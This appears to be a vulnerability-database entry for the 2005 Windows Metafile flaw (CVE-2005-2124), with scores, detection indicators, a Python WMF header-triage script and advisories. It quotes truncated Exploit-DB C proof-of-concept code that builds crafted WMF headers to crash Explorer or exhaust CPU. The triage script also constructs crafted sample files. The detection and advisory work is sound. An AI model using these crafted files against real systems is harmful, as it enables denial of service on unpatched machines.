CVE-2005-2124
Published 2005-11-29
Priority P2 · 58 · high · 7.6 CVSS 2.0
AV:N/AC:H/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS 59.62% (99.0th percentile)
Unspecified vulnerability in the Graphics Rendering Engine (GDI32.DLL) in Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1, related to "An unchecked buffer" and possibly buffer overflows, allows remote attackers to execute arbitrary code via a crafted Windows Metafile (WMF) format image, aka "Windows Metafile Vulnerability."
Affected (7 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | windows_2003_server | — | — |
| microsoft | windows_2003_server | — | — |
| microsoft | windows_2003_server | — | — |
| microsoft | windows_2003_server | — | — |
| microsoft | windows_2003_server | — | — |
| microsoft | windows_2003_server | — | — |
| microsoft | windows_2003_server | — | — |
Detection & IOCs (extracted from sources)
bytes: d7 cd c6 9a 00 00 c6 fb ca 02 aa 02 39 09 e8 03 00 00 00 00 66 a6
- Crafted WMF file with oversized mtSize (0x7fffffff) and mtMaxRecord (0xffffffff) fields in the header is a strong indicator of an exploit attempt; inspect WMF headers for anomalous/maximum field values.
- Crafted WMF file with mtSize and Largest record size both set to 0xffffffff causes 100% CPU utilization in Internet Explorer; detect WMF files with these fields set to the maximum DWORD value.
- The vulnerability is in GDI32.DLL's Graphics Rendering Engine when processing Windows Metafile (WMF) images; monitor for rendering of WMF files from remote/untrusted sources via Explorer or Internet Explorer on unpatched systems.
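The header checks the IOC entries above describe, as an added example (not code from the original page, from Exploit-DB, or from any of the sources cited here): a Python triage script that decodes the 22-byte placeable header and the 18-byte METAHEADER according to the MS-WMF field layout, verifies the placeable checksum, flags the maximum-value mtSize / mtMaxRecord fields, and walks the record list to catch records that overrun the file. The placeable header bytes reused as sample input are the ones quoted above; the METAHEADER and records of the three sample files are constructed here, and the mtNoObjects check is a low-confidence addition based on the MS05-053 denial-of-service note further down the page.

```python
"""WMF header triage (added example; not code from the original page or its sources)."""
import struct
from functools import reduce
from operator import xor

PLACEABLE_KEY = 0x9AC6CDD7   # stored little-endian on disk: d7 cd c6 9a
PLACEABLE_LEN = 22           # Key, HWmf, BoundingBox (4 x int16), Inch, Reserved, Checksum
METAHEADER_LEN = 18          # 9 WORDs: mtType .. mtNoParameters (MS-WMF layout)
MAX_DWORD = 0xFFFFFFFF
MAX_INT32 = 0x7FFFFFFF


def placeable_checksum(placeable: bytes) -> int:
    """Placeable-header convention: XOR of the ten WORDs that precede the Checksum field."""
    return reduce(xor, struct.unpack("<10H", placeable[:20]), 0)


def parse_wmf(data: bytes) -> dict:
    """Decode the header fields of a WMF blob; raises ValueError if the header is truncated."""
    hdr, off = {"placeable": False}, 0
    if len(data) >= 4 and struct.unpack_from("<I", data)[0] == PLACEABLE_KEY:
        if len(data) < PLACEABLE_LEN:
            raise ValueError("truncated placeable header")
        _, _, left, top, right, bottom, inch, _, checksum = struct.unpack_from("<IHhhhhHIH", data)
        hdr.update(placeable=True, bbox=(left, top, right, bottom), inch=inch,
                   checksum_ok=checksum == placeable_checksum(data[:PLACEABLE_LEN]))
        off = PLACEABLE_LEN
    if len(data) < off + METAHEADER_LEN:
        raise ValueError("truncated METAHEADER")
    names = ("mtType", "mtHeaderSize", "mtVersion", "mtSize",
             "mtNoObjects", "mtMaxRecord", "mtNoParameters")
    hdr.update(zip(names, struct.unpack_from("<HHHIHIH", data, off)))
    hdr["body_words"] = (len(data) - off) // 2     # WORDs actually present after the placeable header
    hdr["records_off"] = off + METAHEADER_LEN
    return hdr


def walk_records(data: bytes, off: int) -> tuple:
    """Walk (RecordFunction, RecordSize) pairs up to META_EOF; returns (records, error_or_None)."""
    records = []
    while off + 6 <= len(data):
        size_words, func = struct.unpack_from("<IH", data, off)
        if size_words < 3:                         # size + function alone already take 3 WORDs
            return records, f"record at offset {off} claims {size_words} words (< 3)"
        if off + size_words * 2 > len(data):
            return records, f"record at offset {off} runs {size_words} words past end of file"
        records.append((func, size_words))
        off += size_words * 2
        if func == 0x0000:                         # META_EOF
            return records, None
    return records, "no META_EOF record before end of file"


def triage_wmf(data: bytes) -> list:
    """Findings for one WMF blob; an empty list means the header agrees with the file."""
    try:
        h = parse_wmf(data)
    except ValueError as exc:
        return [f"malformed: {exc}"]
    findings = []
    if h["placeable"] and not h["checksum_ok"]:
        findings.append("placeable header checksum mismatch")
    if h["mtHeaderSize"] != 9:
        findings.append(f"mtHeaderSize is {h['mtHeaderSize']}, expected 9")
    if h["mtSize"] in (MAX_DWORD, MAX_INT32):      # the two values the IOC entries call out
        findings.append(f"mtSize 0x{h['mtSize']:08x}: maximum value seen in crafted files")
    elif h["mtSize"] > h["body_words"]:
        findings.append(f"mtSize {h['mtSize']} words exceeds the {h['body_words']} words present")
    if h["mtMaxRecord"] == MAX_DWORD:
        findings.append("mtMaxRecord 0xffffffff: maximum value seen in crafted files")
    records, err = walk_records(data, h["records_off"])
    if err:
        findings.append(err)
    if records and max(size for _, size in records) > h["mtMaxRecord"]:
        findings.append(f"a record exceeds mtMaxRecord ({h['mtMaxRecord']} words)")
    if h["mtNoObjects"] == 0:                      # low confidence: legal for trivial files
        findings.append("mtNoObjects is 0 (informational; the MS05-053 PoC uses this value)")
    return findings


# Constructed samples. The placeable header is the byte string quoted in the IOC list above
# (Inch = 1000, Checksum 0xa666 verifies); METAHEADER and records are built here.
PLACEABLE = bytes.fromhex("d7cdc69a0000c6fbca02aa023909e8030000000066a6")
PEN_RECORD = struct.pack("<IHHhhI", 8, 0x02FA, 0, 1, 0, 0)   # META_CREATEPENINDIRECT, 8 words
DEL_RECORD = struct.pack("<IHH", 4, 0x01F0, 0)               # META_DELETEOBJECT, 4 words
EOF_RECORD = struct.pack("<IH", 3, 0x0000)                   # META_EOF, 3 words
BODY = PEN_RECORD + DEL_RECORD + EOF_RECORD                   # 15 words of records


def build_wmf(mt_size: int, mt_no_objects: int, mt_max_record: int, body: bytes = BODY) -> bytes:
    """Assemble placeable header + METAHEADER (mtType 1, 9 words, version 0x0300) + records."""
    header = struct.pack("<HHHIHIH", 1, 9, 0x0300, mt_size, mt_no_objects, mt_max_record, 0)
    return PLACEABLE + header + body


BENIGN = build_wmf(mt_size=9 + len(BODY) // 2, mt_no_objects=1, mt_max_record=8)
CRAFTED_MAX_FIELDS = build_wmf(mt_size=MAX_INT32, mt_no_objects=1, mt_max_record=MAX_DWORD)
CRAFTED_ZERO_OBJECTS = build_wmf(mt_size=9 + len(BODY) // 2, mt_no_objects=0, mt_max_record=8)
```

Run it over a file with `triage_wmf(open(path, "rb").read())`: an empty list means the header is consistent with the bytes that follow it, the two "maximum value" hits correspond to the signatures in the IOC entries, and the record walk catches the subtler case where mtSize and mtMaxRecord look plausible but a record's own size field points past the end of the file. An mtNoObjects of 0 is legal for trivial metafiles, so that finding is informational, not a verdict; the checksum mismatch and overrun findings are the ones worth escalating on their own.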
CVSS provenance
- nvd: v2.0, 7.6 HIGH, AV:N/AC:H/Au:N/C:C/I:C/A:C
- vulncheck: 7.5 HIGH
GHSA
GHSA-w8ch-g4f3-mw6x: Unspecified vulnerability in the Graphics Rendering Engine (GDI32
ghsa_unreviewed·2022-05-01
CVE-2005-2124 [HIGH] GHSA-w8ch-g4f3-mw6x: Unspecified vulnerability in the Graphics Rendering Engine (GDI32
Unspecified vulnerability in the Graphics Rendering Engine (GDI32.DLL) in Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1, related to "An unchecked buffer" and possibly buffer overflows, allows remote attackers to execute arbitrary code via a crafted Windows Metafile (WMF) format image, aka "Windows Metafile Vulnerability."
GHSA
GHSA-w94w-cg39-6r6h: The Windows Graphical Device Interface library (GDI32
ghsa_unreviewed·2022-05-01·CVSS 7.5
CVE-2005-4560 [HIGH] CWE-20 GHSA-w94w-cg39-6r6h: The Windows Graphical Device Interface library (GDI32
The Windows Graphical Device Interface library (GDI32.DLL) in Microsoft Windows allows remote attackers to execute arbitrary code via a Windows Metafile (WMF) format image with a crafted SETABORTPROC GDI Escape function call, related to the Windows Picture and Fax Viewer (SHIMGVW.DLL), a different vulnerability than CVE-2005-2123 and CVE-2005-2124, and as originally discovered in the wild on unionseek.com.
VulnCheck
Microsoft Windows Improper Input Validation
vulncheck·2005·CVSS 7.5
CVE-2005-4560 [HIGH] Microsoft Windows Improper Input Validation
The Windows Graphical Device Interface library (GDI32.DLL) in Microsoft Windows allows remote attackers to execute arbitrary code via a Windows Metafile (WMF) format image with a crafted SETABORTPROC GDI Escape function call, related to the Windows Picture and Fax Viewer (SHIMGVW.DLL), a different vulnerability than CVE-2005-2123 and CVE-2005-2124, and as originally discovered in the wild on unionseek.com.
Affected: Microsoft Windows
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.cve.org/CVERecord?id=CVE-2005-4560; https://learn.microsoft.com/en-us/security-updates/securitybulletins/2006/ms06-001
No detection rules found.
Exploit-DB
Microsoft Windows Metafile - 'mtNoObjects' Denial of Service (MS05-053)
exploitdb·2005-11-30
CVE-2005-2124 Microsoft Windows Metafile - 'mtNoObjects' Denial of Service (MS05-053)
---
```c
/*
 * Author: Winny Thomas
 * Pune, INDIA
 *
 * The crafted metafile (WMF) from this code when viewed in explorer crashes it. The issue is seen
 * when the field 'mtNoObjects' in the Metafile header is set to 0x0000.
 * The code was tested on Windows 2000 server SP4. The issue does not occur with the
 * hotfix for GDI (MS05-053) installed.
 *
 * Disclaimer: This code is for educational/testing purposes by authorized persons on
 * networks/systems setup for such a purpose. The author of this code shall not bear
 * any responsibility for any damage caused by using this code.
 *
 */
#include
unsigned char wmfheader[] =
"\xd7\xcd\xc6\x9a\x00\x00\xc6\xfb\xca\x02\xaa\x02\x39\x09\xe8\x03"
"\x00\x00\x00\x00\x66\xa6"
"\x01\x00" //mt
```
Exploit-DB
Microsoft Windows Metafile - 'gdi32.dll' Denial of Service (MS05-053)
exploitdb·2005-11-29
CVE-2005-2124 Microsoft Windows Metafile - 'gdi32.dll' Denial of Service (MS05-053)
---
```c
/*
 * Author: Winny Thomas
 * Pune, INDIA
 *
 * The crafted metafile from this code when viewed in internet explorer raises the CPU utilization
 * to 100%. The code was tested on Windows 2000 server SP4. The issue does not occur with the
 * hotfix for GDI (MS05-053) installed
 *
 * Disclaimer: This code is for educational/testing purposes by authorized persons on
 * networks/systems setup for such a purpose. The author of this code shall not bear
 * any responsibility for any damage caused by using this code.
 *
 */
#include
unsigned char wmfheader[] =
"\xd7\xcd\xc6\x9a\x00\x00\xc6\xfb\xca\x02\xaa\x02\x39\x09\xe8\x03"
"\x00\x00\x00\x00\x66\xa6"
"\x01\x00"
"\x09\x00"
"\x00\x03"
"\xff\xff\xff\xff" //Metafile file size
"\x04\x00
```
No writeups or analysis indexed.
References
- http://secunia.com/advisories/17223
- http://secunia.com/advisories/17461
- http://secunia.com/advisories/17498
- http://securityreason.com/securityalert/161
- http://securitytracker.com/id?1015168
- http://support.avaya.com/elmodocs2/security/ASA-2005-228.pdf
- http://www.eeye.com/html/research/advisories/AD20051108a.html
- http://www.eeye.com/html/research/advisories/AD20051108b.html
- http://www.kb.cert.org/vuls/id/433341
- http://www.securityfocus.com/bid/15356
- http://www.us-cert.gov/cas/techalerts/TA05-312A.html
- http://www.vupen.com/english/advisories/2005/2348
- https://docs.microsoft.com/en-us/security-updates/securitybulletins/2005/ms05-053
Published 2005-11-29